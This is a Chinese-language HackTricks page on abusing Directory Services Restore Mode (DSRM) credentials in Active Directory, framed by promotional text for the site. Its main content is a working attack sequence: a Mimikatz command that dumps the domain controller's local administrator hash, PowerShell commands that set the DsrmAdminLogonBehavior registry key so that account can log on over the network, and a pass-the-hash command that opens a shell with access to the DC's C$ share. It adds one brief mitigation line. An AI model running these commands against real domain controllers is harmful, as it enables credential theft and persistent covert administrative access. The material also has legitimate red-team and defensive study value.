hacktricks/windows-hardening/active-directory-methodology/dsrm-credentials.md

从零开始学习AWS黑客技术，成为 htARTE（HackTricks AWS红队专家）！

其他支持HackTricks的方式：

• 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
• 获取官方PEASS & HackTricks周边产品
• 探索PEASS家族，我们的独家NFTs
• 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
• 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

DSRM凭据

每个DC中都有一个本地管理员帐户。在此计算机中具有管理员权限后，您可以使用mimikatz来转储本地管理员哈希。然后，修改注册表以激活此密码，以便您可以远程访问此本地管理员用户。
首先，我们需要转储DC中本地管理员用户的哈希：

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

然后我们需要检查该账户是否有效，如果注册表键具有值"0"或不存在，则需要将其设置为"2"：

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

然后，使用 PTH，您可以列出 C$ 的内容甚至获取 shell。请注意，为了在内存中使用该哈希创建一个新的 PowerShell 会话（用于 PTH），使用的"域"只是 DC 机器的名称：

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

更多信息请查看：https://adsecurity.org/?p=1714 和 https://adsecurity.org/?p=1785

缓解措施

• 事件 ID 4657 - 审计 HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior 的创建/更改

从零开始学习 AWS 黑客技术，成为专家 htARTE（HackTricks AWS 红队专家）！

支持 HackTricks 的其他方式：

• 如果您想看到您的公司在 HackTricks 中做广告或下载 PDF 版本的 HackTricks，请查看订阅计划!
• 获取官方 PEASS & HackTricks 商品
• 探索PEASS 家族，我们的独家NFT收藏
• 加入 💬 Discord 群组 或 电报群组 或关注我们的Twitter 🐦 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。